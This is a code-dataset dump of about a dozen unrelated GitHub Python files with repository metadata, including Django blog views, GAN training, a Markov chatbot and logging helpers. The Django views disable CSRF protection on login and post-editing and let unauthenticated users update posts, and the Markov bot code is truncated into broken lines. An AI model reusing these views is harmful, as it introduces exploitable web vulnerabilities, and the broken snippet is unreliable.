setting Kitchen door SDL to open\")\n ageSDL[SDLVarKitchenDoor] = (0,)\n else:\n PtDebugPrint(\"Cleft.OnLoad: either Kitchen and/or Office door is already open... leaving Kitchen door alone\")\n\n pass\n\n\n def OnNotify(self,state,id,events):\n global fissureDrop\n\n if (id == respFissureDropMain.id):\n PtDebugPrint(\"FISSUREDROP.OnNotify: respFissureDropMain.id callback\")\n if fissureDrop:\n cam = ptCamera()\n cam.enableFirstPersonOverride()\n fissureDrop = 0\n avatar = PtGetLocalAvatar()\n avatar.avatar.unRegisterForBehaviorNotify(self.key)\n PtEnableMovementKeys()\n PtSendKIMessage(kEnableEntireYeeshaBook,0)\n\n\n def OnBehaviorNotify(self,type,id,state):\n global fissureDrop\n \n #PtDebugPrint(\"Cleft.OnBehaviorNotify(): %d\" % (type))\n if type == PtBehaviorTypes.kBehaviorTypeLinkIn and not state:\n PtDebugPrint(\"FISSUREDROP.OnBehaviorNotify: fissureDrop = %d\" % (fissureDrop))\n if fissureDrop:\n PtDebugPrint(\"Cleft.OnBehaviorNotify(): will run respFissureDropMain now.\")\n respFissureDropMain.run(self.key,avatar=PtGetLocalAvatar())\n","repo_name":"H-uru/Plasma","sub_path":"Scripts/Python/Cleft.py","file_name":"Cleft.py","file_ext":"py","file_size_in_byte":9773,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"30"} +{"seq_id":"24381816262","text":"\n\nimport os\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\n\n\nclass Config:\n def __init__(self) -> None:\n self.API_ID: str = os.environ.get(\"API_ID\", None)\n self.API_HASH: str = os.environ.get(\"API_HASH\", None)\n self.SESSION: str = os.environ.get(\"SESSION\", None)\n self.SUDOERS: list = [\n int(id) for id in os.environ.get(\"SUDOERS\", \" \").split() if id.isnumeric()\n ]\n if not self.SESSION or not self.API_ID or not self.API_HASH:\n print(\"Error: SESSION, API_ID and API_HASH is required!\")\n quit(0)\n self.QUALITY: str = os.environ.get(\"QUALITY\", \"high\").lower()\n self.PREFIXES: list = os.environ.get(\"PREFIX\", \"!\").split()\n self.LANGUAGE: str = os.environ.get(\"LANGUAGE\", \"en\").lower()\n\n\nconfig = Config()\n","repo_name":"ALBINPRAVEEN/MusicUserbot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"30"} +{"seq_id":"73243587924","text":"from django.core.checks import messages\nfrom django.shortcuts import render\nfrom my_blog.models import *\nfrom django.shortcuts import redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate, login\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n# Create your views here.\n\n# home page of my_blog\n\n\ndef home(request):\n if request.method == 'GET':\n\n entry = Entry.objects.all().order_by('date_added')\n # top_rated = Entry.objects.annotate(\n # no_of_likes=Count('likes')).order_by('-no_of_likes')[:2]\n pages = Paginator(entry, 6)\n\n if request.GET.get('page'):\n print('executed')\n page_num = request.GET.get('page')\n page = pages.page(page_num)\n else:\n page = pages.page(1)\n\n entries = page.object_list\n\n print(len(entries))\n return render(request, 'base/base.html', {'entries': entries,\n 'pages': pages})\n\n\ndef get_article(request):\n if request.method == 'GET':\n filter_ = request.GET.get('id')\n article = Entry.objects.get(id=filter_)\n context = {\n 'entry': article}\n return render(request, 'my_blog/article.html', context)\n\n\n@csrf_exempt\ndef add_post(request):\n if 
request.user.is_authenticated:\n\n if request.method == 'GET':\n context = {\n 'choices': Category.objects.all(),\n }\n\n if request.method == 'POST':\n name = request.POST.get('article_name')\n topic_name = request.POST.get('topic_name')\n category = Category.objects.get(name=topic_name)\n detail = request.POST.get('text')\n picture = request.FILES.get('picture')\n\n topic = Topic(name=name,\n user=request.user, article_name=category)\n topic.save()\n entry = Entry.objects.create(\n user=request.user, topic=topic, text=detail, picture=picture)\n\n entry.save()\n return redirect('/')\n\n return render(request, 'my_blog/add_post.html', context)\n else:\n return redirect('/login')\n\n\n@csrf_exempt\ndef login_admin(request):\n # login form\n if request.method == 'POST':\n username = request.POST.get('username')\n pass_ = request.POST.get('password')\n user = authenticate(request, username=username, password=pass_)\n if user is not None:\n login(request, user)\n # user is authenticated\n return redirect('/')\n else:\n # add a message code here\n messages.add_message(request, messages.INFO, 'wrong credentials')\n return render(request, 'my_blog/login_form.html')\n\n\n@csrf_exempt\ndef update_post(request, topic_id):\n\n # getting topic text and updating\n if request.method == \"GET\":\n topic_ini = Topic.objects.get(id=topic_id)\n topic_text = Entry.objects.get(topic=topic_ini).text\n context = {\n 'topic': topic_ini,\n 'text': topic_text\n }\n return render(request, 'my_blog/add_page.html', context)\n\n else:\n topic_ini = Topic.objects.get(id=topic_id)\n new_entry = Entry.objects.get(topic__id=topic_id)\n topic_ini.article_name = request.POST['topic_name']\n topic_ini.save()\n new_entry.text = request.POST['text']\n new_entry.save()\n return redirect('/dashboard')\n\n\ndef get_categories(request):\n if request.method == 'GET':\n categories = Category.objects.all()\n context = {\n 'categories': categories,\n }\n return render(request, 'my_blog/display_categories.html', context)\n\n\ndef get_specifics(request):\n if request.method == 'GET':\n filter_ = request.GET.get('category')\n print(filter_)\n topics = Topic.objects.filter(\n article_name__name__iexact=filter_).order_by('-date_added')\n\n print(topics)\n context = {\n 'specifics': True,\n 'topics': topics\n }\n return render(request, 'learning_logs/display_categories.html', context)\n","repo_name":"atifasr/my_blog","sub_path":"my_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"12187583650","text":"from argparse import ArgumentParser\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn.functional as F\nfrom torch import optim\nimport torchvision.utils as vutils\nfrom utils import create_op_dir\nfrom config import SEEDS\nfrom archs.lenet5 import LeNet5, LeNet5Halfed\nfrom archs.resnet import ResNet18\nfrom archs.gan import Generator\n\n\ndef train(args, gan, model, device, optimizer, epoch):\n model.eval()\n gan.train()\n for i in range(120):\n optimizer.zero_grad()\n z = torch.randn(args.batch_size, args.latent_dim)\n gen_imgs = gan(z)\n outputs_T, features_T = model(gen_imgs, out_feature=True)\n pred = outputs_T.data.max(1)[1]\n loss_activation = -features_T.abs().mean()\n loss_one_hot = F.cross_entropy(outputs_T, pred)\n softmax_o_T = F.softmax(outputs_T, dim=1).mean(dim=0)\n loss_information_entropy = (softmax_o_T * torch.log(softmax_o_T)).sum()\n loss = (\n 
loss_one_hot * args.oh\n            + loss_information_entropy * args.ie\n            + loss_activation * args.a\n        )\n        loss.backward()\n        optimizer.step()\n        if i == 1:\n            print(\n                \"[Epoch %d/%d] [loss_oh: %f] [loss_ie: %f] [loss_a: %f]\"\n                % (\n                    epoch,\n                    args.epochs,\n                    loss_one_hot.item(),\n                    loss_information_entropy.item(),\n                    loss_activation.item(),\n                )\n            )\n\n\ndef generate_and_display(args, gan):\n    def show_imgs(x, new_fig=True):\n        grid = vutils.make_grid(x.detach().cpu(), nrow=8, normalize=True, pad_value=0.3)\n        grid = grid.transpose(0, 2).transpose(0, 1) # channels as last dimension\n        if new_fig:\n            plt.figure()\n        plt.imshow(grid.numpy())\n\n    noise = torch.randn(64, args.latent_dim)\n    imgs = gan(noise)\n    show_imgs(imgs)\n\n\ndef train_model(gan, model, device, config_args):\n    gan = gan.to(device)\n    model = model.to(device)\n    optimizer = optim.Adam(gan.parameters(), lr=config_args.lr, weight_decay=5e-4)\n    for epoch in range(1, config_args.epochs + 1):\n        train(\n            config_args, gan, model, device, optimizer, epoch,\n        )\n    generate_and_display(config_args, gan)\n    return gan\n\n\ndef train_gan(args):\n\n    use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n    device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n    # Initialize arguments based on dataset chosen\n    if args.dataset == \"disjoint_mnist\":\n        args.d1 = \"first5_mnist\"\n        args.d2 = \"last5_mnist\"\n        args.m1_input_channel = 1\n        args.m2_input_channel = 1\n        args.output_size = 5\n    elif args.dataset == \"mnist_cifar10\":\n        args.d1 = \"mnist\"\n        args.d2 = \"cifar10\"\n        args.m1_input_channel = 1\n        args.m2_input_channel = 3\n        args.output_size = 10\n\n    # Initialize models based on architecture chosen\n    if args.arch == \"lenet5\":\n        arch = LeNet5\n    elif args.arch == \"lenet5_halfed\":\n        arch = LeNet5Halfed\n    elif args.arch == \"resnet18\":\n        arch = ResNet18\n\n    # Create the directory for saving if it does not exist\n    create_op_dir(args.output_dir)\n\n    print(f\"Dataset: {args.dataset}\")\n    print(f\"Model: {args.arch}\")\n\n    for i in range(len(args.seeds)):\n        print(f\"Iteration {i}, Seed {args.seeds[i]}\")\n\n        np.random.seed(args.seeds[i])\n        torch.manual_seed(args.seeds[i])\n\n        # Load models\n        model1 = arch(\n            input_channel=args.m1_input_channel, output_size=args.output_size\n        ).to(device)\n        model1.load_state_dict(\n            torch.load(\n                args.model_dir + f\"{args.d1}_{args.arch}_{args.seeds[i]}\",\n                map_location=torch.device(\"cpu\"),\n            )\n        )\n        gan1 = train_model(\n            gan=Generator(\n                img_size=32, latent_dim=args.latent_dim, channels=args.m1_input_channel\n            ).to(device),\n            model=model1,\n            device=device,\n            config_args=args,\n        )\n\n        model2 = arch(\n            input_channel=args.m2_input_channel, output_size=args.output_size\n        ).to(device)\n        model2.load_state_dict(\n            torch.load(\n                args.model_dir + f\"{args.d2}_{args.arch}_{args.seeds[i]}\",\n                map_location=torch.device(\"cpu\"),\n            )\n        )\n        gan2 = train_model(\n            gan=Generator(\n                img_size=32, latent_dim=args.latent_dim, channels=args.m2_input_channel\n            ).to(device),\n            model=model2,\n            device=device,\n            config_args=args,\n        )\n\n        # Save the gan models\n        torch.save(\n            gan1.state_dict(),\n            args.output_dir\n            + f\"gan_{args.dataset}({args.d1})_{args.arch}_{args.seeds[i]}\",\n        )\n        torch.save(\n            gan2.state_dict(),\n            args.output_dir\n            + f\"gan_{args.dataset}({args.d2})_{args.arch}_{args.seeds[i]}\",\n        )\n\n\nif __name__ == \"__main__\":\n    parser = ArgumentParser()\n    parser.add_argument(\n        \"--dataset\",\n        type=str,\n        default=\"disjoint_mnist\",\n        choices=[\"disjoint_mnist\", \"mnist_cifar10\"],\n    )\n    parser.add_argument(\n        \"--arch\",\n        type=str,\n        
default=\"lenet5\",\n choices=[\"lenet5\", \"lenet5_halfed\", \"resnet18\"],\n )\n parser.add_argument(\"--batch_size\", type=int, default=512)\n parser.add_argument(\"--test_batch_size\", type=int, default=1000)\n parser.add_argument(\"--epochs\", type=int, default=200)\n parser.add_argument(\"--lr\", type=float, default=0.2, help=\"learning rate\")\n parser.add_argument(\n \"--latent_dim\", type=int, default=100, help=\"dimensionality of the latent space\"\n )\n parser.add_argument(\n \"--img_size\", type=int, default=32, help=\"size of each image dimension\"\n )\n parser.add_argument(\"--oh\", type=float, default=1, help=\"one hot loss\")\n parser.add_argument(\"--ie\", type=float, default=10, help=\"information entropy loss\")\n parser.add_argument(\"--a\", type=float, default=0.1, help=\"activation loss\")\n parser.add_argument(\"--no_cuda\", type=bool, default=False)\n parser.add_argument(\"--log_interval\", type=int, default=10)\n parser.add_argument(\"--save_results\", type=bool, default=True)\n parser.add_argument(\"--model_dir\", type=str, default=\"./cache/models/\")\n parser.add_argument(\"--output_dir\", type=str, default=\"./cache/models/gan/\")\n\n args = parser.parse_args()\n args.seeds = SEEDS\n\n train_gan(args)\n","repo_name":"cwkang1998/network-merging","sub_path":"train_gan.py","file_name":"train_gan.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"} +{"seq_id":"25248101329","text":"try:\n from .import gen_lookup\nexcept:\n from .import gen_lookup_python as gen_lookup\n #print(\"using python integration for line aware stat (install boost and gsl C++ libraries for faster runtime -- see documentation)\")\nimport numpy as np\nimport sys\nimport json\nimport pickle as pickle\nimport argparse\nimport os\n\ndef save_lookup_amp(p1,p2,ratio,outdir, ndet=2, pow_range = (1,400,500), frac_range = (0.1,1,10)):\n \"\"\"\n save the lookup table for two detectors with the line aware statistic with consitistent amplitude\n (uses json to save file)\n Args\n --------------\n p1 : float\n width of prior of signal model\n p2 : float\n width of prior of line model\n ratio : float\n ratio of line to noise models\n outdir: string\n directory to save lookup table file\n pow_range: tuple\n ranges for the spectrogram power (lower, upper, number), default (1,400,500)\n frac_range: tuple\n ranges for the ratios of sensitivity and duty cycle (lower, upper, number), default (0.1,1,10)\n \"\"\"\n minimum,maximum,num = pow_range\n minn,maxn,numn = frac_range\n #ch_arr_app = gen_data.gen_lookup_noise(np.linspace(minimum,maximum,num),np.linspace(minimum,maximum,num),np.linspace(minn,maxn,numn),int_type=\"chi2\",approx=False,pvs=p1,pvl=p2,beta=ratio)\n filename = outdir+\"/ch2_signoiseline_{}det_{}_{}_{}.json\".format(ndet,p1,p2,ratio)\n if os.path.isfile(filename):\n print((\"File {} exists\".format(filename)))\n else:\n ch_arr_app = gen_lookup.LineAwareAmpStatistic(np.linspace(minimum,maximum,num),fraction=np.linspace(minn,maxn,numn), ndet=ndet,signal_prior_width=p1,line_prior_width=p2,noise_line_model_ratio=ratio)\n with open(filename,'w+') as f:\n save_data = [[minimum,maximum,num,minn,maxn,numn],np.log(ch_arr_app[0]).tolist()]\n\n json.dump(save_data,f)\n\ndef save_lookup(p1,p2,ratio,outdir,ndet=2,pow_range = (1,400,500), k=2, N=48):\n \"\"\"\n save the lookup table for two detectors with the line aware statistic\n \n Args\n --------------\n p1 : float\n width of prior of signal model\n p2 : float\n width 
of prior of line model\n ratio : float\n ratio of line to noise models\n outdir: string\n directory to save lookup table file\n pow_range: tuple\n ranges for the spectrogram power (lower, upper, number), default (1,400,500)\n\n \"\"\"\n\n minimum,maximum,num = pow_range\n\n if os.path.isfile(outdir+\"/signoiseline_{}det_{}_{}_{}.txt\".format(ndet, p1,p2,ratio)):\n pass\n else:\n if ndet == 1:\n ch_arr_app = gen_lookup.LineAwareStatistic(np.linspace(minimum,maximum,num),\n ndet=ndet,\n signal_prior_width=p1,\n line_prior_width=p2,\n noise_line_model_ratio=ratio)\n if ndet == 2:\n powers = np.linspace(minimum,maximum,num)\n ch_arr_app = gen_lookup.LineAwareStatistic(powers=powers,\n ndet=ndet,\n k = k,\n N = N,\n signal_prior_width=p1,\n line_prior_width=p2,\n noise_line_model_ratio=ratio)\n with open(outdir+\"/signoiseline_{}det_{}_{}_{}.txt\".format(ndet, p1,p2,ratio),'wb') as f:\n header = \"{} {} {}\".format(minimum,maximum,num)\n np.savetxt(f,np.log(ch_arr_app.signoiseline),header = header)\n\n\n\ndef resave_files(p1,p2,ratio,output):\n \"\"\"\n resave text files into pickle format\n \"\"\"\n if os.path.isfile(output+\"/txt/ch2_signoiseline_{}_{}_{}.txt\".format(p1,p2,ratio)):\n with open(output+\"/txt/ch2_signoiseline_{}_{}_{}.txt\".format(p1,p2,ratio),'rb') as f:\n save_array = pickle.load(f)\n if os.path.isdir(output+\"/pkl/\"):\n pass\n else:\n os.mkdir(output+\"/pkl/\")\n with open(output+\"/pkl/ch2_signoiseline_{}_{}_{}.pkl\".format(p1,p2,ratio),'wb') as f:\n pickle.dump(save_array,f,protocol=pickle.HIGHEST_PROTOCOL)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n prog = 'SOAP lookup table generation',\n description = 'generates lookup tables for SOAP',)\n\n parser.add_argument('--amp-stat',action='store_true') \n parser.add_argument('-s', '--signal-probability', required=True, type=float) \n parser.add_argument('-l', '--line-probability', required=True, type=float) \n parser.add_argument('-n', '--noise-line-ratio', required=True, type=float) \n parser.add_argument('-ndet', '--ndet', default=2, required=False, type=int) \n parser.add_argument('-k', default=2, required=False, type=int) \n parser.add_argument('-N', '--num-sfts', default=48, required=False, type=int) \n parser.add_argument('-o', '--save-dir', required=True, type=str) \n \n parser.add_argument('-pmin', '--pow-min', default=1, required=False, type=float) \n parser.add_argument('-pmax', '--pow-max', default=400, required=False, type=float) \n parser.add_argument('-np', '--n-powers', default=500, required=False, type=int) \n\n parser.add_argument('-fmin', '--frac-min', default=0.1, required=False, type=float) \n parser.add_argument('-fmax', '--frac-max', default=1, required=False, type=float) \n parser.add_argument('-nf', '--n-fracs', default=10, required=False, type=int) \n\n args = parser.parse_args()\n\n if not args.amp_stat:\n save_lookup(args.signal_probability,\n args.line_probability,\n args.noise_line_ratio,\n args.save_dir,\n k = args.k,\n N = args.num_sfts,\n ndet=args.ndet,\n pow_range = (args.pow_min,args.pow_max,args.n_powers))\n else:\n save_lookup_amp(args.signal_probability,\n args.line_probability,\n args.noise_line_ratio,\n args.save_dir, \n ndet = args.ndet, \n pow_range = (args.pow_min,args.pow_max,args.n_powers), \n frac_range = 
(args.frac_min,args.frac_max,args.n_fracs))\n","repo_name":"jcbayley/soapcw","sub_path":"src/soapcw/line_aware_stat/save_lookup.py","file_name":"save_lookup.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"40694326118","text":"############################################################################\n# PROBLEM - Apples and Oranges\n'''Sample input\n7 11\n5 15\n3 2\n-2 2 1\n5 -6\n'''\n#---------------------------------------------------------------------------\n# solution 1\ndef countApplesAndOranges(s, t, a, b, apples, oranges):\n count_apple = sum([ ((f+a)>=s and (f+a)<=t) for f in apples])\n count_oranges = sum([ ((o+b)>=s and (o+b)<=t) for o in oranges])\n print(count_apple, count_oranges, sep = '\\n')\n\n\n# Solution 2\ndef countApplesAndOranges2(s, t, a, b, apples, oranges):\n print(sum(s <= a + d <= t for d in apples))\n print(sum(s <= b + d <= t for d in oranges))\n\n\nif __name__ == '__main__':\n st = input().split()\n s = int(st[0])\n t = int(st[1])\n ab = input().split()\n a = int(ab[0])\n b = int(ab[1])\n mn = input().split()\n m = int(mn[0])\n n = int(mn[1])\n apples = list(map(int, input().rstrip().split()))\n oranges = list(map(int, input().rstrip().split()))\n countApplesAndOranges(s, t, a, b, apples, oranges)\n\n#---------------------------------------------------------------------------","repo_name":"ygnash/Hacker_Rank_Solutions","sub_path":"ProblemSolving/apples_oranges.py","file_name":"apples_oranges.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"72243945046","text":"import re\r\nimport random\r\nfrom analyzer import analyze,keyword_check,parse\r\nfrom itertools import chain\r\n\r\nclass Markov:\r\n def make(self):\r\n \r\n filename = \"log.txt\"\r\n with open(filename,\"r\",encoding='utf_8')as f:\r\n text=f.read()\r\n text=re.sub('> ','',text)\r\n text=re.sub(\r\n 'ptna:Repart|ptna:Random|ptna:Pattern|ptna:Template|ptna:markov',\r\n '',\r\n text)\r\n text = re.sub('Ptna System Dialogue Log:.*\\n','',text)\r\n text = re.sub('\\n\\n','\\n',text)\r\n\r\n wordlist = parse(text)\r\n markov ={}\r\n p1=''\r\n p2=''\r\n p3=''\r\n for word in wordlist:\r\n if p1 and p2 and p3:\r\n if (p1,p2,p3) not in markov:\r\n markov[(p1,p2,p3)]=[]\r\n markov[(p1,p2,p3)].append(word)\r\n p1,p2,p3=p2,p3,word\r\n count = 0\r\n sentence=''\r\n p1,p2,p3 =random.choice(list(markov.keys()))\r\n while count ')\r\n parse = analyze(line)\r\n\r\n m=[]\r\n for word,part in parse:\r\n if keyword_check(part):\r\n for element in sentences:\r\n find = '.:?'+ word +'.*'\r\n tmp=re.findall(find,element)\r\n if tmp:\r\n m.append(tmp)\r\n m = list(chain.from_iterable(m))\r\n if m:\r\n print(random.choice(m))\r\n else:\r\n print(random.choice(sentences))","repo_name":"Rinsama10/ptna","sub_path":"ptna/markov2_bot.py","file_name":"markov2_bot.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"10300823121","text":"# -*- python -*-\n# encoding: utf-8\n\nimport os\n\ndef configure(conf):\n conf.env.append_value('MODULES_AVAILABLE', 'mateconf')\n if 'mateconf' in conf.env['ENABLE_MODULES'] or 'all' in conf.env['ENABLE_MODULES']:\n if conf.pkg_check_modules('MATECONF', 'mateconf-2.0 >= 2.12 pygobject-2.0',\n mandatory=False):\n conf.env.append_value('MODULES_TO_BUILD', 'mateconf')\n\n\ndef 
build(bld):\n \n if 'mateconf' in bld.env['MODULES_TO_BUILD']:\n bld.codegen('mateconf', local_load_types=['mateconf-arg-types.py'])\n pyext = bld.create_pyext()\n pyext.source = 'mateconfmodule.c mateconf.c mateconf-fixes.c mateconf-types.c'\n pyext.target = 'mateconf'\n pyext.uselib = 'MATECONF'\n pyext.includes = '.'\n pyext.install_path = '${PYTHONDIR}/gtk-2.0'\n\n bld.install_files('${DATADIR}/pygtk/2.0/defs',\n ['mateconf.defs'])\n\n bld.install_files('${DATADIR}/pygtk/2.0/argtypes',\n 'mateconf-arg-types.py')\n","repo_name":"mate-desktop-legacy-archive/python-mate","sub_path":"mateconf/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"3956576480","text":"from tests.atest.utils import RuleAcceptance\n\n\nclass TestRuleAcceptance(RuleAcceptance):\n def test_rule(self):\n self.check_rule(src_files=[\"test.robot\"], expected_file=\"expected_output.txt\")\n\n def test_severity(self):\n self.check_rule(\n config=\"-c too-many-arguments:severity_threshold:warning=5:error=7\",\n src_files=[\"severity.robot\"],\n expected_file=\"expected_output_severity.txt\",\n )\n\n def test_disablers(self):\n self.check_rule(\n config=\"-c too-many-arguments:max_args:1\",\n src_files=[\"disablers.robot\"],\n expected_file=\"expected_output_disablers.txt\",\n )\n","repo_name":"MarketSquare/robotframework-robocop","sub_path":"tests/atest/rules/lengths/too_many_arguments/test_rule.py","file_name":"test_rule.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"30"} +{"seq_id":"14984443988","text":"import argparse\nimport logging\nimport os\n\nimport yaml\nfrom jinja2 import Environment, FileSystemLoader\n\nCONFIG_DIR = \"dag_configs/\"\nOUTPUT_DIR = \"outputs/\"\n\nlogger = logging.getLogger(__name__)\n\n\ndef fetch_args():\n \"\"\"Process command line argument options\n\n Returns\n -------\n arg : namespace values\n \"\"\"\n p = argparse.ArgumentParser()\n p.add_argument(\n \"--job_type\",\n help=\"Type of job to execute.\",\n nargs=\"+\",\n type=str,\n required=False,\n )\n p.add_argument(\n \"--job_name\",\n help=\"Name of job to execute.\",\n nargs=\"+\",\n type=str,\n required=False,\n )\n return p.parse_args()\n\n\ndef fetch_dags(job_types=None, job_names=None):\n \"\"\"Return the configurations needed for the jobs to compose.\n Consider the passed in filters or return everything if both are None.\n\n Parameters\n ----------\n job_types : str\n types of jobs to filter down to use for processing\n job_names : str\n names of jobs to filter down to use for processing\n\n Returns\n -------\n file_location, template, config_name : Tuple[str]\n Location of the configuration\n Template to use for composition\n Name of the configuration\n \"\"\"\n\n def filter_condition(item, filter_list):\n ret_val = False\n if filter_list and item not in filter_list:\n ret_val = True\n return ret_val\n\n # consider all files in the folder (and subfolders) for processing\n for path, folder, configs in os.walk(CONFIG_DIR):\n _, template = os.path.split(path)\n\n # filter by template name for the type of job to compose\n if filter_condition(template, job_types):\n continue\n\n for config in configs:\n config_name, _ = os.path.splitext(config)\n\n # filter by config_name value for the names of jobs to compose\n if filter_condition(config_name, job_names):\n continue\n\n file_location = os.path.join(path, config)\n 
yield file_location, template, config_name\n\n\ndef generate_dags():\n def generate_dag(file_location, template, config_name):\n export_filename = os.path.join(OUTPUT_DIR, f\"load_{config_name}.py\")\n template = env.get_template(f\"{template}.template\")\n\n with open(file_location, \"r\") as configuration_file:\n configuration = yaml.load(configuration_file, Loader=yaml.SafeLoader)\n\n output = template.render(\n dag_name=config_name,\n version_number=configuration.get(\"version\"),\n description=configuration.get(\"description\"),\n schedule=configuration.get(\"schedule\"),\n max_runs=configuration.get(\"max_runs\"),\n tags=configuration.get(\"tags\"),\n catchup=configuration.get(\"catchup\"),\n endpoint=configuration.get(\"endpoint\"),\n )\n\n with open(export_filename, \"w\") as export_file:\n export_file.write(output)\n export_file.write(\"\\n\")\n\n logger.info(f\"DAG file {export_filename} created\")\n\n env = Environment(loader=FileSystemLoader(\"templates\"))\n dags_to_generate = fetch_dags(args.job_type, args.job_name)\n\n for file_location, template, config_name in dags_to_generate:\n generate_dag(file_location, template, config_name)\n\n\nif __name__ == \"__main__\":\n # Get the passed in arguments\n args = fetch_args()\n generate_dags()\n","repo_name":"paschmaria/datafest-airflow-workshop","sub_path":"dags_generation/generate_dag_files.py","file_name":"generate_dag_files.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"38916531861","text":"import logging\nimport sys\nimport os\n\nimport seo.slo.error\n\n\ndef create_console_handler(prog_name, debug_flag):\n \"\"\" Create the console logging handler\n\n Parameters:\n prog_name - program name as provided by the argparse.ArgumentParser.prog field\n debug_flag - if true, the log threshold will be set to DEBUG and the logs will be printed in a verbose\n format; otherwise the log threshold will be set to INFO\n \"\"\"\n\n entry_fmt_long = f\"%(asctime)s.%(msecs)03d {prog_name}: [%(levelname)s] %(message)s (%(module)s@%(lineno)d)\"\n entry_fmt_short = f\"{prog_name}: [%(levelname)s] %(message)s\"\n date_fmt = \"%H:%M:%S\"\n\n handler = logging.StreamHandler(sys.stderr)\n if debug_flag:\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(logging.Formatter(entry_fmt_long, date_fmt))\n else:\n handler.setLevel(logging.INFO)\n handler.setFormatter(logging.Formatter(entry_fmt_short, date_fmt))\n\n return handler\n\n\ndef create_file_handler(prog_name, logs_path):\n \"\"\" Create the file logging handler\n\n Parameters:\n prog_name - program name as provided by the argparse.ArgumentParser.prog field\n logs_path - path to the logs output directory\n \"\"\"\n\n entry_fmt = (\n \"%(asctime)s.%(msecs)03d [%(levelname)5.5s] %(message)s (%(module)s@%(lineno)d)\")\n date_fmt = \"%Y-%m-%d_%H:%M:%S\"\n\n prog_base = os.path.splitext(os.path.basename(prog_name))[0]\n file_path = os.path.join(logs_path, f\"{prog_base}.log\")\n\n try:\n os.makedirs(logs_path, exist_ok=True)\n except OSError as e:\n raise seo.slo.error.AppException(\n seo.slo.error.Codes.RUNTIME_ERROR,\n f\"Failed to create the logs directory ({os.path.relpath(logs_path)}):\\n\"\n f\" {e}\")\n\n try:\n with open(file_path, \"a\") as f:\n f.write(f\"{'='*119}\\n\")\n except OSError as e:\n raise seo.slo.error.AppException(\n seo.slo.error.Codes.RUNTIME_ERROR,\n f\"Failed to write to the log file ({os.path.relpath(file_path)}):\\n\"\n f\" {e}\")\n\n handler = 
logging.FileHandler(file_path)\n    handler.setLevel(logging.DEBUG)\n    handler.setFormatter(logging.Formatter(entry_fmt, date_fmt))\n\n    logging.info(\"Program logs are saved to the '%s' file\", os.path.relpath(file_path))\n\n    return handler\n\n\ndef config(prog_name, debug_flag, logs_path=None):\n    \"\"\" Configure the logging package considering provided CLI arguments\n\n        Parameters:\n            prog_name - program name as provided by the argparse.ArgumentParser.prog field\n            debug_flag - enable more verbose screen logs when true; see the create_console_handler function doc\n            logs_path - path to the logs output directory; when None, the file logging will be disabled\n    \"\"\"\n\n    # Enable the console logger in the first place. Splitting it from the file handler creation will allow consistent\n    # error handling if a runtime error occurs during the file handler creation:\n    logging.getLogger().addHandler(create_console_handler(prog_name, debug_flag))\n    logging.getLogger().setLevel(logging.DEBUG)\n    # Enable the file logger:\n    if logs_path:\n        logging.getLogger().addHandler(create_file_handler(prog_name, logs_path))\n","repo_name":"mahehswari/new-","sub_path":"scripts/deploy_esp/seo/slo/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
+{"seq_id":"32775999081","text":"from dash import Dash\nfrom dash.dependencies import Input, Output, State\n\n\ndef select_all_callback(app: Dash, button_id: str, dropdown_id: str):\n    @app.callback(\n        Output(dropdown_id, 'value'),\n        Input(button_id, 'n_clicks'),\n        State(dropdown_id, 'options')\n    )\n    def __select_all_callback(click, options):\n        values = [\n            e if type(e) != dict else e['value'] for e in\n            options\n        ]\n        return values\n","repo_name":"IBM/nesa-demo","sub_path":"utils_demo/callbacks/select_all_callback.py","file_name":"select_all_callback.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"30"}
+{"seq_id":"17922074472","text":"# Import the csv module to read the csv file\n# Import the os file to join with the path and make it independent of os type\nimport csv\nimport os\n\ncsvpath = os.path.join('..','Resources', 'budget_data.csv')\n\nwith open(csvpath, newline='') as csvfile:\n\n    # CSV reader specifies the delimiter and variable that holds contents\n    csvreader = csv.reader(csvfile,delimiter=',')\n\n    next(csvreader) # Skip header\n    row_count = 0\n    previous = 0\n    delta_list = []\n    # Read inside the with-block so the file is still open, convert the column\n    # to a number, and only append a difference once a previous value exists\n    for row in csvreader:\n        value = int(row[1])\n        if row_count > 0:\n            difference = previous - value\n            delta_list.append(difference)\n        previous = value\n        row_count += 1","repo_name":"JFrancisOlson/Python","sub_path":"difference_calcs.py","file_name":"difference_calcs.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
